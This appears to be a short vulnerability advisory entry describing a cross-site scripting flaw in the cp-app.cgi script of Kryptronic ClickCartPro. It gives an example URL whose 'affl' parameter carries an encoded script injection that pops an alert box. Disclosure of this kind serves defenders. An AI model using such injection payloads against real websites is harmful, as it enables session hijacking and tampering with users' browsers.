• info
• discussion
• exploit
• solution
• references

Kryptronic ClickCartPro CP-APP.CGI Cross-Site Scripting Vulnerability

No exploit is required.

An example URI sufficient to exploit this issue was provided:
http://www.example.com/cp-app.cgi?usr=51H4515590&rnd=577308&rrc=N&affl=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E